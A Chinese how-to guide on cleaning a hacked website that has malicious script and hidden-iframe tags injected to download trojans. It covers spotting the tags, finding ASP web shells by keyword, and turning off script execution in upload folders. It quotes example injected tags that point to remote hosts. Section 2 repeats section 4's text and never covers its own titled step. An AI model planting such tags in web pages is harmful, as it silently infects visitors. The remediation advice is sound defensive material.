网站被挂马后的处理方法

确认被卦的代码 → 替换被卦的文件 → 找出木马 → 关闭上传目录的执行权限 → 通知用户修改无组件上传代码漏洞


1.  确认被挂的代码

确认被挂代码的方式非常简单,这些代码都有共同的HTML标记:<script src=……></script>或者<iframe src=……></iframe>。一般向网页文件加入下载木马的代码都在文件的末尾,语句都是直接调用远程代码文件下载病毒,例如这俩HTML标记里”src“路径都带有”http://“,极少部分挂马者会将下载木马的代码文件直接上传到服务器上。我们略作识别就可以知道哪些文件被挂代码,如:

(1)文件中包含<scriptsrc=http://%61%76%65%32%2E%63%6E></script>,这种看上去莫名其妙代码肯定是被挂在上去的。

(2) 文件中包含<iframesrc=http://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>,这类代码有时候可能是用户自己加入的,比如进行pv统计等其他流量统计代码,判断是先新建一个空白htm文件,比如test.htm,将代码拷贝至文件中,通过本地计算机域名访问(请勿直接在服务器上访问),杀毒软件出现病毒提示则已经确定是被卦代码,判断不带”http://“路径的标记是否被挂马的方式也是如此,方法简单有效。

(3)同一段代码在同一个文件里面反复出现,如图:

(4)所有代码的文件属性中修改时间都完全接近,如图:


2.替换被卦的文件

先从服务器上确认用于存放上传文件的目录,一般这类目录里面全部都是图片,或者有一部分被上传上来的木马程序,在iis里面展开站点,右键点击目录,选择属性,打开该文件夹的属性窗口。在”执行许可”窗口里,将脚本执行权限修改成”无”,这样,该目录就不具备脚本执行权限了,里面的所有脚本运行时提示403禁止执行的错误。依次查找该站点的其他上传目录,也可以将所有存放图片的目录都作此修改,预防万一。


3.找出木马

目前的木马绝大部分都是asp文件,分为加密和未加密文件,由于木马文件为了能够给控制者提权,是需要读取注册表某些键值,我们只需要在未加密木马文件中查找包含”HKLM\SYSTEM\“关键字的文件绝对都是木马,用户程序是不会去读服务器注册表的。如果文件已经加密,则加密文件中基本上都含有”VBScript.Encode“字符,所以只需要搜索以上两个关键字的文件,能够所处绝大部分木马文件来,搜索方法如下图:


4.关闭上传目录的执行权限

一般无组件上传都会特定上传目录,用于存放上传文件。木马需要被上传上来首先就要伪装成图片上传到指定的目录里面,如果我们将该目录在iis里的脚本执行权限关闭,即设置成”无”脚本执行权限,那么上传的木马即使在服务器上也无法运行,就不会对用户站点或者服务器造成危害,方法如下图:

先从服务器上确认用于存放上传文件的目录,一般这类目录里面全部都是图片,或者有一部分被上传上来的木马程序,在iis里面展开站点,右键点击目录,选择属性,打开该文件夹的属性窗口。在”执行许可”窗口里,将脚本执行权限修改成”无”,这样,该目录就不具备脚本执行权限了,里面的所有脚本运行时提示403禁止执行的错误。依次查找该站点的其他上传目录,也可以将所有存放图片的目录都作此修改,预防万一。

5 . 通知用户修改无组件上传代码漏洞

用户站点上存在木马,绝对是由于用户的上传程序存在检测漏洞,请及时更新上传代码,以免遭受不必要的损失。